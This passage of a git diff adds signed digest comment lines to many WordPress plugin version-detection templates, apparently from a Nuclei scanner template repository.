4a0a00473045022003d1419a067c721539e550f56c01cca1c91b348eea1077d375f9e8059844dddf022100ce5e82afa3338512470f96c9e852181e5477ed32d835cce355b89aaa789c8cad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c92091767..38840df0a3 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cd3467afa6a3448921ecccf41ee7e056305fd0d07e1dd53915543311ad7138510220570459b1d291d511360b1dc13afbddc64cc2c36f56b8e8c756a3d3c4d598fc23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b25c6c9a9c..6c47a02e89 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c8b39944dc797eea6b528572fd3dff6e8a14796baa1bc10ed7c5c90d409c3614022100b97210d4a98d79681923aea3ebb64edd180d47cce24e474b33f412d309973262:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1781172d05..a841bf80b5 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220382e2d04ac93657214b796362085de1c7d4d2d2e003057feb9b608093a8777ba02207b2892bf63a2de429b352abf90cf97e7372261b2546c45ee7765a2de9382e456:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 92c8ce3409..fde6fcf574 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a8d8cee82df7c0b1cebc473eeab01ae4671afe2c387d74857c65e6f5fdcd165602205bead162f7aa88e2180eff222f5ced37b75c3acd66c85330a0e8ca6099018201:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eea42ed8da..49f16a90ea 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220016e3678774f9d7a128c5a9ad61b39ae663c9d25813c652b1ce5d1a89a5a39a0022100a6a7d80289f7c85f52137be3d2ad98c59b470b47f1a71a1f4d61ea4a078873f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bedb85a0eb..b6e668bb0c 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cca8f198ca9135b83d9019278e77824a30884ebfcb00a603bd1b0ab64e961ae9022100adaccfb7a34eec109a637ef2444616d68701e3878dff581648ccfd02aa0a9329:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 45bbbc71df..4d9f504b8b 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220332172adb0ee7cba49e14077ffff9d9d4b6e61fc44aee6007a29ba63256fcb1c022073de631518c3fd8e811ddc4cbf56e44e6abc20c430d4ad62f307ba69e99aeab3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03befac73e..1e595e0ad3 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fa91f34467e6102fc87f4432dfa50b3abab05d58485ee3a595b82bb1c200c86c02202f59642a41e4535c8250b503595e65bb6055de77d80a7706a01b9ca70d1a2419:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index e1f0093127..af1e927c7d 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202b5cb8e0492890527241e6921bab1bda5cdd8f123aa2cd21cb05ab7631125d10022019c9469dc39d3c28cdd6a79cdb43142c8e48a7e05671d0e2b1c5195386a33049:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 0db316d66d..cde0ad2446 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204160782ad88fc260ab40dc3dae0bde2207a7c3cd850e889710bdacffc6eb8f6b022100acdd96db6b79da79890d8e8fc63272a87c49741977eb453df1d48d71a5b46a14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 135639253d..3c13570954 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d34c288b20f177c3c9b3c1c1a6bf7f60bfcbe9885c738ca4369ec537faf168ac022100986eb7216c1e9567a729468c85d508800dcfba5a76fe9f9c46b4e7e4070d9c0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 540fbaf9ac..0feffa39bf 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bf9d639f8c00fa5f0970636db98458657bfc02f7b08769991b75fe3cc6ea4ad402201c60476fa4bc5ea0fff486faa9f14b09cb11b38de146b6a8e2fd2de718e119c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7e71b4736f..543c65d689 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d3943c8a7cfd89c49bbd57af28dc87a6710ec212b21e2bcc5f9eb5a9b76d069202202832c6d8fca3a46e068aeeeecf6bf0400619940316d9424481e1f59fdd583cd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 88a70b2478..6fbe83523b 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a89b94d95980253ac7a12fe3cb052d928ca2de530b7705e7c206bf25038c612d022100bbc4a5081511d9ebdd36fb1396d1732153cc377b872dc167b3a3dbc83be07f41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index fc498e67e6..63244b3805 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203ceec9db04511ad79c95275648a762c98947c685bfeaf0c0279e42270ee9c63c022100efd32b2ab6aaf5836004a866d23f946e965e7da9e6e968232a106c52cf53e93a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 465aa93d57..642a67f119 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203edbd49a2d911642b262eb06efbc5fe4268f942a39e2ac23aaa901bf58bd43bf022100883ac6b29673b4b3e3aca98a6db4cdc3ffea04fa6781184d9ca190fcf8fb213e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a1b0e57a9..815e01c861 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100959e7f4a39717aabb315cbd8a988afeb41f6706ecd4c318607da438b1a9b9dd102206104249d7270d6354c4cc7aa4f8d7aa877ed23ae2cfdce7b37bf8facc58b4f27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index df35e8b415..21900d3088 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203641c8d46e6557b6d88a36c7553814346c3dd29e40e28a4548e9116de237929702210082735b10ccbf5b38a83bc3e2d26899a680f69c8b4db071432e76bc9d73cf2804:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 033cc4bc3d..5f2ff6c8b9 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207ff41408696489d8a3f60f356e4f742477749b2fe0c83742e40e84b2ffc777a9022039463fc1ef93c291ad1216d5a65f82fbd93a25de11ab2c1c66f31ac506f68861:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluent-smtp.yaml b/http/technologies/wordpress/plugins/fluent-smtp.yaml index 4a3dcbd210..468a7796f9 100644 --- a/http/technologies/wordpress/plugins/fluent-smtp.yaml +++ b/http/technologies/wordpress/plugins/fluent-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ae31043e3253cd41868f79b4095b01f2ef71da2f958f501ea1c6893447705c28022100b40ac5c899a2e70ebe588af931d36d611be1b4091b9a381f89c642b4fb0eb7c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 945ab6ad03..b823b539ef 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022044967a7995def79279f552385710b6a1575254712205aa51255ffd6e8dfad08f0221009d5b2526099a432a180e50afa047520c2b49ce6e2abe38c02497b594a9de48db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 2072b51ab9..62866cca58 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022045706cb3873781e54ba78423e162f3f91b5995e572d4189b597da2a2a725e7650221008dabcb23978cb5e255490d351eaad89449f78e2e99abffd49e1488a7867e5c6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b509d8cc67..0c878fc937 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022071fc1dc0aa1a50e1bb11c65e76e50b7e12a652f8ccc18aa23b2cc504a36c9a390221009b5ac1a36dbe6c86f174568b9959f591b19ec5352eff772569e41dc47ef50fef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c984479bde..652a4d4c7e 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008b25d1647a0e3a6445ee8d3c6403da023411de38a384b6de1e200de2c9e312af022100c8c465a16434bd237705678ded0bb50db77bcace5360cafceb9691b6318b544f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index a3870175c7..81e7148f98 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204c5b7021e64e7553005e3c0906ca7a4d62dfad01387bbad6731d467cce2ba654022053a97e338520e9e7199dc4e5b6cb1b5c43f3cce96998fcbcd46d54cccdc9fe53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f5f3818ea2..bac2605b84 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202fa34a0c9e1748a3f7264a60b843423e03733a4477507a5f5500654d8feee6bb02202fbe17ce8e215c45a8d18b86f80af9f9b976547a4f821a9063eede355837b838:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7e5b54c12c..aeaa157d13 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210086223102680360d818285a43fd433c73a0ad882228f076b6a468741fffb6f7630220250005c6c90415591a29b165994be73f4f4170cb6c0b65a8352b68b03120ebf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 59effd09f6..e79c9cea9f 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ad88ded3d2ad1e866ac71c48da64b72b34a7de4001649b7af98d6fe8bbea3508022100976bb9207584ae9aaa81dc58485679f34af3ec11f318cd16e1e90976f161b339:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 833207dcff..54fb08cb23 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201d93e4d72db958fd609aa4092aab594a8db57ea80243659d4d143b41c031b8e0022100d9550932df3d82499fcf5d7a974449318f5125a197a8b0a87dfc221015614701:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b7ea2d38d1..ebc1b10906 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022010c393b677124e0a413e50d14115683786bb8e1d1e430d2b9ffaf89438caeaad022100ec056262dfa49ca4313a733e6a7c015e46ff2d3b4f39bf4645314a0043e9aefd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2131dbe751..1993f19513 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ec33a4a850fc60d745a78d5c64cdf5edea201c6a58abbeff4edc363e55bc9b5a022100874d5095444135bd564700a1eaf9fe3a4ef2b773e895c74b15cbad8552c625ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 73d644c5e4..94c59a4e45 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200e5bd8972f93310e72e534d823408d0341dd5a4d72c01c20d7ecf1670b785e45022100b589386dac4467175345f96b365a6a00a8bb8312c3da36af5ed9b5377e296d13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 7b0593dcb7..153daed8c2 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210084a53a5b431c4ad3a39910495d8bd7b22952bc639afc6b1b37be53360635a1b0022100f17b9dea7aa5e22fcf72ba7bc281c979b495daefa575c3a14832d48aeeb33e10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6f65d087e4..af15383bee 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206c4a030e3722541db872e3215a163d9fa95691c325c206ac88db3d390e41664702202d970b640c222f39cef63da8dab88bdedfb6d2791be088d5a4919c27f7ea9036:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 783cdd283d..c0e993089d 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207caa6f2663ed95f5fc47f053de8dbb9a7422cae9178bde4a367be268773b81a402201e16873c2218759b5937f1c11da01fb7862fcb1d9cd617a72244ee6d62595613:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 05121854b3..e7b08c0cff 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205a15b6f507303535051d651e6125ba2e516b071acd1406728bbdba9cecc7a54002200239bf61e3fe0ec5fa919cd8e0e3febcd48c15ad0263c2ca90181fa564ac6166:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 72f52edcd4..f0f089d1c2 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cc10fcc55e048b13607a6665cca771b917ff5c92e052b22d09078827f796e1ff022100d782e9f7f20253aa27878bde69d615d39872e5b3f79ed352b48f0a7f18519ec2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4cf45ebd74..d89c80f565 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203f2b23d483d4451d78d1aedbb275d2f9e0a69a4413e74b62365451a25cea2b3b022100e746cb47df9c86b11617f3fdeecec19dba7c481cd2bdce04ef4dacd8eb1e610b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 3d6863e074..a538f634f0 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f924cc322bbcfb40e8af66529d094d1d6b774e7915139854e0cf77a80bae75c6022100e959c2f77675d2372e555c777cf4cf5cf093a545dea7b7a790d65ab85d9c8431:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 79e2813c5e..d181675bf2 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cf709bc69611119af31db3f3c295524089154144c4ede4fbb17c1e568c06a7f6022100f123a372153abe942017d11211dd093a1ff958629aa1e126a2b5f47688ac94d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ab9a0f1ae3..e9d62ced31 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022063d5ee1dc91045e63f531e677836d291f66772cd0894c1749c7d8017bec86f63022100cd41ea1b21fa94cc615c351e70567a7de654fc240821e0e6af3784d94ceebd02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 5d3adf7c27..6a1ce825d0 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210088046bba4c7bdc4f256f4232211c0474c5dda96b1db287044b37421345efd51202207b2d59f92d66aaa7e29b9012a0795a2af7ad2e807840fcca0f8601ea6194c03e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index fea9594fa0..ccc753e793 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f0e2e95c5199cd95d3c4153c78383000f01876ab47a647fa5462fdcfac2276f9022100e9305363dd7ac4b4c7fc6a49a0f59b7352a9badd4239541a421e6451a322b4ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 16dfc8df5f..ef0b675ca3 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c9b1b265313621b2285e6fcd46e36cd8e1231de2b590ebfc433aa5a3048e1fd402202a8add28acb32730a66f423f539889d3462716b0e4fd788c8beebc5b9313396c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 4b7600ea69..4d09d48f4e 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220237cb9b60d6e87f6d0f0b7e7602a237c7bbc027751edfa9e04165c556e83a22a0220127d6d4efed9ba1cc1db234e0d925a033e4d675dc04714e2ab3fb96d43af3226:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2ccd4dbce8..8dd87713dc 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f23c182dfd8c5a15d0eed5ad98cbdb4b0092adc0bc990ee056d7cb1c20bb5b39022100b0bb2fe389d508eedd6f6963ac169fc38fe57e9f49d3e5be6be5c2ed27bf7691:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 02ceb224d1..ed22cd651a 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 